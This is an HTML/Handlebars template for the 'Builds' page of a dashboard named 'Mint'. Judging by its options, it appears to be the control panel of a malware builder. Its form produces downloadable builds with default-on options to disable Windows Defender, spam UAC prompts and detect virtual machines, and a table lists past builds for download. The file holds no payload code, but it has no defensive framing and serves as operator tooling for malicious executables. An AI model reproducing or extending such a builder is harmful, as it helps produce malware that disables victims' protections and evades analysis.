<!DOCTYPE html>

<html lang="en">

<head>

    <title>Mint</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="description" content="" />
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons+Outlined" rel="stylesheet">
    <link rel="stylesheet" href="/css/global.css">
    <link rel="stylesheet" href="/css/builds.css">

</head>

<body>
    <div class="dashboard">
        {{> rightmenu}}
        <div class="main">
            <div class="title">
                <h2>Builds</h2>
            </div>

            <div class="build-container">
                <div class="build">
                    <div class="title">
                        <span class="material-icons-outlined">handyman</span>
                        Builds
                    </div>
                    {{#if info}}
                    <div class="info">
                        <span class="material-icons-outlined">info</span>
                        {{info}}
                    </div>
                    {{/if}}
                    {{#if error}}
                    <div class="error">
                        <span class="material-icons-outlined">warning</span>
                        {{error}}
                    </div>
                    {{/if}}
                    <form method="post" action="/panel/builds">
                        <div class="input-group">
                            <input type="text" name="name" id="name" placeholder="Name" required>
                            <label>Name</label>
                        </div>
                        <label class="form-control">
                            Disable Windows Defender
                            <input type="checkbox" name="wdefender" id="wdefender" checked>
                        </label>
                        <label class="form-control">
                            Uac Spam
                            <input type="checkbox" name="uacspam" id="uacspam" checked>
                        </label>
                        <label class="form-control">
                            Anti-Vm
                            <input type="checkbox" name="antivm" id="antivm" checked>
                        </label>
                        <button class="primary">Build</button>
                    </form>
                </div>
                <div class="table">
                    <table>
                        <thead>
                            <tr>
                                <td>DATE</td>
                                <td>INFO</td>
                                <td>DELETE</td>
                                <td>DOWNLOAD</td>
                            </tr>
                        </thead>
                        <tbody>
                            {{#each builds}}
                            <tr>
                                <td>{{toLocal date}}</td>
                                <td>{{info}}</td>
                                <td><a href="/panel/builds/delete?id={{_id}}" class="delete"><span class="material-icons-outlined delete">delete</span></a></td>
                                <td>
                                    <a href="{{path}}">
                                        <div class="download">
                                            <span class="material-icons-outlined">arrow_downward</span>
                                        </div>
                                    </a>
                                </td>
                            </tr>
                            {{/each}}
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>

</body>

</html>